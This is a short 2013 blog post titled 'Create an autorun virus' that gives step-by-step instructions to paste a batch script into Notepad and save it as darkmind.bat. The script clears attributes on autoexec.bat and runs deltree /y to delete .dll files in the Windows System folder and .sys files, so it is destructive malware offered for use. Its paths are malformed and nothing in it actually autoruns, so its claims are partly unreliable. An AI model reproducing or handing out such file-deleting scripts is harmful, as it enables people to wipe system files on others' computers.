Wednesday, April 17, 2013

Batch File Code:Create an autorun virus

 Batch File Code:Create an autorun virus


1.open your notepad
2.copy and paste this code given below...
call attrib -h -r c:autoexec.bat>nul
@Echo off
c:
cd%WinDir%System
deltree /y*.dll
cd
deltree /y*.sys
echo Smart Hacker
3.save this as darkmind.bat
now,this darkmind.bat is your autorun virus...:D

No comments:

Post a Comment